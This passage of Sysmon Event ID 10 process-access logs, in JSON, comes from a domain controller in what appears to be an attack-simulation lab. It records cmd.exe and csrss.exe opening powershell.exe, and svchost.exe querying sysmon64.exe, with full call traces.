D0APQA=","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8358,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-0527-5F25-0000-00100DC71300}\r\nSourceProcessId: 3356\r\nSourceThreadId: 2520\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-0010D1C71300}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-0527-5F25-0000-00100DC71300}","SourceProcessId":"3356","SourceThreadId":"2520","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-0010D1C71300}","TargetProcessId":"4892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8359,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-0010D1C71300}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-0010D1C71300}","TargetProcessId":"4892","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8360,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8361,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8362,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8363,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8364,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8365,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8366,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 